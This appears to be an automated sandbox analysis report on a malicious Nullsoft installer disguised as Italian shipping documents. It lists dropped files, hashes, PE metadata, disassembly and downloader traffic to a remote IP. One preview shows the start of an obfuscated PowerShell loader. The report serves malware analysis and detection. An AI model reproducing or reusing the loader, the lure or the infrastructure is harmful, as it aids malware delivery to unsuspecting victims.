                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):7168
                                      Entropy (8bit):5.2959870663251625
                                      Encrypted:false
                                      SSDEEP:96:JwzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuH0DQ:JTQHDb2vSuOc41ZfUNQZGdHM
                                      MD5:B4579BC396ACE8CAFD9E825FF63FE244
                                      SHA1:32A87ED28A510E3B3C06A451D1F3D0BA9FAF8D9C
                                      SHA-256:01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
                                      SHA-512:3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Joe Sandbox View:
                                      • Filename: 4hIPvzV6a2.exe, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse
                                      • Filename: 3Dut8dFCwD.exe, Detection: malicious, Browse
                                      • Filename: Ms63nDrOBa.exe, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                      • Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse
                                      • Filename: rSCAN31804.exe, Detection: malicious, Browse
                                      • Filename: rSCAN31804.exe, Detection: malicious, Browse
                                      • Filename: SCAN00381638.SCR.exe, Detection: malicious, Browse
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Category:dropped
                                      Size (bytes):748488
                                      Entropy (8bit):7.618269683518012
                                      Encrypted:false
                                      SSDEEP:12288:nfLdembnSidSCwsYk8KSO4nMUBOGmJ9R01jS+VBtyS9TvkXFDsiJjWlWVB0mPH:nfLNnSsms/8K54nsVJ9F+VHtkXF4i7XH
                                      MD5:6C446FD0A3F6D498F5CBD0725CE7F232
                                      SHA1:D814C5F4BC9A61690318BA2ED8EC22D55AF16CCE
                                      SHA-256:8A149E1DED1CCE5485B9783687DD8F94C2F3926EDD17E62A682FE56CC73B1AE4
                                      SHA-512:7A2F40DE4785734831AB45945D2A7C0D610D597DB90AAC644FACA8C0A4F4D35A4D7D0B2C9397C41F8FC993B91D5EE4BDD5D1E870488CE49F11F34ECB3939B746
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 8%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................P...d...........a..0............................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....d...P...f..................@..@................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):26
                                      Entropy (8bit):3.95006375643621
                                      Encrypted:false
                                      SSDEEP:3:ggPYV:rPYV
                                      MD5:187F488E27DB4AF347237FE461A079AD
                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                      Malicious:false
                                      Preview:[ZoneTransfer]....ZoneId=0
                                      Process:C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):70325
                                      Entropy (8bit):5.158902637069244
                                      Encrypted:false
                                      SSDEEP:1536:7Y7brIQR5wdxbwMj3Li8faaKW0UW9AeKnXhSh04R/ID1d2Xnaah6:8HMQkbwMDlipG/BxfUIhl
                                      MD5:28CAA5C31A5E71EAE249CDDEB36BDC2E
                                      SHA1:0FA31BF12563C08257F3DEF568BBE50F12667418
                                      SHA-256:1248FC3D0506610988E6606216DB30BB9018A411DB91FEBA6F4E2860E98BC967
                                      SHA-512:E866F480B2ECD12324D9B5237B0B0EBFEA13582A8AEB6B1D143BD015C1F5971E4BDF350DBA46EE805696BB0A38422370BB6147F341AF1F8359ECF1BF047B0588
                                      Malicious:false
                                      Preview:$England=$Crispate;<#Skied Beggarly Chalkier Schematical daedaleous Opfinderpris #><#Ddssejlers Cress Suprastigmal #><#Kasketten Palaeornithinae Udstyrsforretningen #><#Ggeblommes Biseriate Fadlsankeret Pensaenes Resurcen #><#Blusteringly Spaltenumrene Parmesanosten #><#nervepatients Skibob Extragalactic Athenaea lykkes #>$Talemaskinen = "sti lne;,phinct`$ Ba,kereexcremelstyloaueRowel ec Hg edetGymnasirMembrano PublikpSfor ikh Unharmy Flau.ts mcgo.aiHealthio PolitilTornensoRverhisgFulmineiDrivgarc reweig=Feriela`$BilagetcCelestioNon nimlDiabetelTwirleduDiscip.s ElemeniOvercenoForraadnSammen.;Bindevvf Ramibiu PedatenRegres c Detentt NeckiniSelvagto gravrsnDokumen SkistvlRDiss,rtePo.yentt.lotricrbebudepaPreapplc Sulfa,tskribleoArtiller Amanues Under Fortovs( lumred`$TyndsliPSlikkero SnildesReval.itsnyltepeWisecrajGumlend2se iepr5Samfund3Rei rig,,videns`$alto.etRSobberaaParoxyslGraferslOestom,erverhi dResoluteBemgdhasChauvinr OpbevaeIn,ramndRechase9Chondr 9T lecom) R,euma Unvenee{,utcaro
                                      Process:C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):245776
                                      Entropy (8bit):1.2423947315855175
                                      Encrypted:false
                                      SSDEEP:768:7x19EzEPqdI04IDk5wH/o606sFjlhpHi98oiQErpn6jGW3LSSW1Vn+7xd4R89Z9u:13ujvdGpic/cN2q8+js/5/H
                                      MD5:9F9EC5CB34B99692A4EAC963634A7D82
                                      SHA1:5C1C97F3B00365F6CDB43112D31D7DD3AA050870
                                      SHA-256:7579E3606C789ED66E555D541F14BDA6ECAEA4B2EB7B7BC3A25E7C804B3AB48F
                                      SHA-512:A574404306396B333F64FC16256C093CA1F2B6CF87E5675ED678F00DE3B899FFE4A95CBA4D1113B9C86B8C46549D06D7AB97930955F921CD73AE37D4067B1EB0
                                      Malicious:false
                                      Preview:......................................................{............J...............l....................w...........N....................................................................\.........................................|.........................{..............i.................................k...............!......&..............................................................................................................."...........................t.:...s............................................................A...................................................................d.........................2.......|................................................Y............&...............................5.......(................................`..............................*............i..........................................>........................................~.....................................................................................................I
                                      Process:C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):452228
                                      Entropy (8bit):1.250842541049128
                                      Encrypted:false
                                      SSDEEP:768:qlmssNPVJP2ri6hEVTp7WLL1GEOCTOemgej7kcwntQz2Y1drtNhgCV+AhB/7/dR+:5tvPloD3bnq3TzwesbDEfLeaz6oSzjU8
                                      MD5:30C2C02FB78EFAA65C6A38457A7DC4F6
                                      SHA1:40AEF6B9982695F88F0515104BFEEACFAF22FEDA
                                      SHA-256:CE57C2DEDAA3A0FD5F5C267F3336F5ACB6109D00D31A98D4638D26A77939CEFC
                                      SHA-512:8AC0B2E7831C801D7C4043195BEFC309F2C79BE719FF0171D0A4E580671EBADD2F737C307A4AAE2E548705CD11B24FE64F07C6E842D7DD5D3CCD88EA677BC7FA
                                      Malicious:false
                                      Preview:...........................................t..................................................................................................a..............d...........................o.........................=..#..............0.........<.........0.......................>..........`..........................................................................................:.........u.............................................0.................................C..~.............................................X......................................................"............................f........................................w.................................{............................"..................e........................................f...........l...............................................I............................ Z...........................;.............;.................................u.................................................................%....
                                      Process:C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):344050
                                      Entropy (8bit):7.580146229974094
                                      Encrypted:false
                                      SSDEEP:6144:9ruXsLmgXj+a9etxVoOztIvtqYNsTOwJOBQ7Uv:9aumgXetHoStettqTOwaQYv
                                      MD5:39486BA352B5221ADE774BCECDE6F4DB
                                      SHA1:1E37B8B97559B16397301136B7B4ABFF7C50E86C
                                      SHA-256:9B9BFB77B758FA9BE7BDDB087F9E0893755B7455BC5AF6DA4E929E0EE3270D8D
                                      SHA-512:1DBA6E25006FA096DD90C7A64097D5F3CFBA857E14D4C32FBC9F4CA04E8E33D744B2C7048B569446024E9CF78577D4240C004BCF7ADE91839D7FAAE1CE864495
                                      Malicious:false
                                      Preview:....................j..hh....i........22..................................,,...$..AAA.............".._..........[.r.............U................^^^......PP........,.....qqq...................++.................|.#.....PPPPP............$$.R.NN...TTT...AA.jjjj.........................B.........y............~.666. .qqq.p...o................###...P..............p.......................5...................GG...........111........v...............SS....^...................z.D...nn.L.........:..........EEEE.ll..........####.^^................GGG................................7777...........Y...hh...w..............llll....A.u.JJ.M....t........8....[.|...-----.((.Z.RR...................................r.f.wwwwwww..s.....zzz..................q...D.........................................f.MM.|...............................................M.V..........K..mmm....R........!.........u..........m....3..........$$.....................uuu.............U...................D......LL..........W..........
                                      Process:C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):328009
                                      Entropy (8bit):1.2551228776153396
                                      Encrypted:false
                                      SSDEEP:1536:AfCPIKQLWsgBwj5eZNb+h+QkSGkJPsGyksKU:ATKZNbTQkSGky0sKU
                                      MD5:78C7002A6C29415CEA767894F99BDF01
                                      SHA1:37B39AF4E61D2A97D1B1AEA54D1C3C3D8C3AD6D8
                                      SHA-256:414BB9BB930F1269088CF9BF027667E6B9A4130E6E719E7C178406A8C8C3183E
                                      SHA-512:A39B5656AF287783AB4C5E211C148D2D233AB635E8D8C4870693D31267904E9C94A3BCC07B20F92C55F68BC7E6E2B5F1D22C6ED3F9B3A729CABD14B2E7B58D58
                                      Malicious:false
                                      Preview:..............................................A............................................]..............2.................................N.................................................................................................................................i.......................................................................................X............h...................j...........,............)...w....................................R.................................V...............................................................R.../.........................................)...................................................].............................,...v............................................./.......................................`........)........#..........x............H.....................................v..........K..........................................................................................................*............................
                                      Process:C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):453
                                      Entropy (8bit):4.241518252490206
                                      Encrypted:false
                                      SSDEEP:6:mTXCFWRbo5FpTNrQNFqqhq48RZ8av8Atp3d6G4bg3pCp+oWKHYAtpcRvFVTZqIMC:0X4OA7aY48MNAtDMeExYAYdfqI1f1o2
                                      MD5:261F38F05E7DE27DA302C07B62E1F94D
                                      SHA1:8D495D43FC7A2B40C52B8D31678F24B519257610
                                      SHA-256:50D950EE2F6CD5D31AAA35B913DC46C8EEE3120B7444EF5EBB302B88851F3328
                                      SHA-512:62106A1D3608A63C12D6E9A7A00FD775ECD38193B779D4C13E18850230F1C7A1F0BD5DF0602AF5553F24BB0BAD6703BB9DC00C09C14E91DD098CE4EC95050E47
                                      Malicious:false
                                      Preview:stulls sprttede trlkvinder materialerne,disciplinerendes antirailwayist topchefs dhyana behovsanalyserne,vager cimnel bonderve debitable karyotin sadelmagervrkstederne samfundskonomien plakatopstning horologe vaner taleruafhaengigt..flimmer carryout arbejdsdisketterne breakaxe vidtaabne elastose.attestationerne mennonist rubicon barogrammerne respectively reddet overretention,brdknivenes yndlingsbog ministate paleogeographically repenalize henriett.
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                      Entropy (8bit):7.618269683518012
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:Documenti di spedizione 0009333000459595995.exe
                                      File size:748'488 bytes
                                      MD5:6c446fd0a3f6d498f5cbd0725ce7f232
                                      SHA1:d814c5f4bc9a61690318ba2ed8ec22d55af16cce
                                      SHA256:8a149e1ded1cce5485b9783687dd8f94c2f3926edd17e62a682fe56cc73b1ae4
                                      SHA512:7a2f40de4785734831ab45945d2a7c0d610d597db90aac644faca8c0a4f4d35a4d7d0b2c9397c41f8fc993b91d5ee4bdd5d1e870488ce49f11f34ecb3939b746
                                      SSDEEP:12288:nfLdembnSidSCwsYk8KSO4nMUBOGmJ9R01jS+VBtyS9TvkXFDsiJjWlWVB0mPH:nfLNnSsms/8K54nsVJ9F+VHtkXF4i7XH
                                      TLSH:ADF412087FA8E5E1C1E6AB7E09B2839716F0B5C615595F03B214FF1E1D6D282860AFF4
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........
                                      Icon Hash:2b25372d4e5ad12f
                                      Entrypoint:0x403532
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                      Signature Valid:false
                                      Signature Issuer:CN="Aeroframes Aflytningssystemer Bjergbestigerne ", E=Aktieprotokols@Prendre.sta, L=Chennevi\xe8res-sur-Marne, S=\xcele-de-France, C=FR
                                      Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                      Error Number:-2146762487
                                      Not Before, Not After
                                      • 02/03/2024 06:36:00 02/03/2027 06:36:00
                                      Subject Chain
                                      • CN="Aeroframes Aflytningssystemer Bjergbestigerne ", E=Aktieprotokols@Prendre.sta, L=Chennevi\xe8res-sur-Marne, S=\xcele-de-France, C=FR
                                      Version:3
                                      Thumbprint MD5:A9C1798AF54D650775446A3D80B6BF4B
                                      Thumbprint SHA-1:41B8490F4D70C866BC6B40E3C8D4461298D816A5
                                      Thumbprint SHA-256:F002E1A6B744FBD194BA357AD5DCAEE7A641A9BEBA07454EAEE85F88880AC806
                                      Serial:1B8139F2ED8C7949105AC8BB448E4891F8934F87
                                      Instruction
                                      sub esp, 000003F8h
                                      push ebp
                                      push esi
                                      push edi
                                      push 00000020h
                                      pop edi
                                      xor ebp, ebp
                                      push 00008001h
                                      mov dword ptr [esp+20h], ebp
                                      mov dword ptr [esp+18h], 0040A2D8h
                                      mov dword ptr [esp+14h], ebp
                                      call dword ptr [004080A4h]
                                      mov esi, dword ptr [004080A8h]
                                      lea eax, dword ptr [esp+34h]
                                      push eax
                                      mov dword ptr [esp+4Ch], ebp
                                      mov dword ptr [esp+0000014Ch], ebp
                                      mov dword ptr [esp+00000150h], ebp
                                      mov dword ptr [esp+38h], 0000011Ch
                                      call esi
                                      test eax, eax
                                      jne 00007F1C0CD6F1BAh
                                      lea eax, dword ptr [esp+34h]
                                      mov dword ptr [esp+34h], 00000114h
                                      push eax
                                      call esi
                                      mov ax, word ptr [esp+48h]
                                      mov ecx, dword ptr [esp+62h]
                                      sub ax, 00000053h
                                      add ecx, FFFFFFD0h
                                      neg ax
                                      sbb eax, eax
                                      mov byte ptr [esp+0000014Eh], 00000004h
                                      not eax
                                      and eax, ecx
                                      mov word ptr [esp+00000148h], ax
                                      cmp dword ptr [esp+38h], 0Ah
                                      jnc 00007F1C0CD6F188h
                                      and word ptr [esp+42h], 0000h
                                      mov eax, dword ptr [esp+40h]
                                      movzx ecx, byte ptr [esp+3Ch]
                                      mov dword ptr [004347B8h], eax
                                      xor eax, eax
                                      mov ah, byte ptr [esp+38h]
                                      movzx eax, ax
                                      or eax, ecx
                                      xor ecx, ecx
                                      mov ch, byte ptr [esp+00000148h]
                                      movzx ecx, cx
                                      shl eax, 10h
                                      or eax, ecx
                                      movzx ecx, byte ptr [esp+0000004Eh]
                                      Programming Language:
                                      • [EXP] VC++ 6.0 SP5 build 8804
                                      NameVirtual AddressVirtual Size Is in Section
                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x86080xa0.rdata
                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x650000x264e8.rsrc
                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                      IMAGE_DIRECTORY_ENTRY_SECURITY0xb61980xa30
                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                      .text0x10000x68d80x6a00742185983fa6320c910f81782213e56fFalse0.6695165094339622data6.478461709868021IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                      .rdata0x80000x14640x1600a995b118b38426885fc6ccaa984c8b7aFalse0.4314630681818182data4.969091535632612IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      .data0xa0000x2a8180x6009a9bf385a30f1656fc362172b16d9268False0.5247395833333334data4.172601271908501IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .ndata0x350000x300000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                      .rsrc0x650000x264e80x266008c15b9178dda9297a3b68e6314e77cb0False0.48827488802931596data5.053989943267582IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                      RT_ICON0x652c80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536EnglishUnited States0.4677629244055365
                                      RT_ICON0x75af00x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864EnglishUnited States0.5025751524069791
                                      RT_ICON0x7ef980x5488Device independent bitmap graphic, 72 x 144 x 32, image size 20736EnglishUnited States0.5306377079482439
                                      RT_ICON0x844200x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384EnglishUnited States0.5394426074633916
                                      RT_ICON0x886480x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216EnglishUnited States0.5737551867219917
                                      RT_DIALOG0x8abf00x100dataEnglishUnited States0.5234375
                                      RT_DIALOG0x8acf00x11cdataEnglishUnited States0.6056338028169014
                                      RT_DIALOG0x8ae100xc4dataEnglishUnited States0.5918367346938775
                                      RT_DIALOG0x8aed80x60dataEnglishUnited States0.7291666666666666
                                      RT_GROUP_ICON0x8af380x4cdataEnglishUnited States0.8157894736842105
                                      RT_VERSION0x8af880x21cdataEnglishUnited States0.5388888888888889
                                      RT_MANIFEST0x8b1a80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                      DLLImport
                                      ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                      SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                      ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                      COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                      USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                      GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                      KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW
                                      Language of compilation systemCountry where language is spokenMap
                                      EnglishUnited States
                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                      2024-09-25T12:09:07.525705+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.449737185.29.11.5380TCP
                                      TimestampSource PortDest PortSource IPDest IP
                                      Sep 25, 2024 12:09:06.864101887 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:06.924427032 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:06.924531937 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:06.924766064 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:06.929584980 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.525511980 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.525562048 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.525576115 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.525592089 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.525605917 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.525619984 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.525705099 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.525826931 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.606007099 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.606035948 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.606051922 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.606065989 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.606085062 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.606086016 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.606092930 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.606108904 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.606120110 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.606127024 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.606142998 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.606142998 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.606161118 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.606185913 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.611905098 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.611958027 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.611958981 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.611974955 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.611989021 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.611999035 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.612030029 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.685673952 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.685699940 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.685728073 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.685736895 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.685740948 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.685779095 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.685779095 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.685832024 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.685848951 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.685864925 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.685868979 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.685894012 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.685914040 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.686274052 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.686291933 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.686306000 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.686317921 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.686335087 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.692287922 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.692312002 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.692327976 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.692336082 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.692357063 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.692379951 CEST4973780192.168.2.4185.29.11.53
                                      Sep 25, 2024 12:09:07.692742109 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.692756891 CEST8049737185.29.11.53192.168.2.4
                                      Sep 25, 2024 12:09:07.692778111 CEST8049737185.29.11.53192.168.2.4
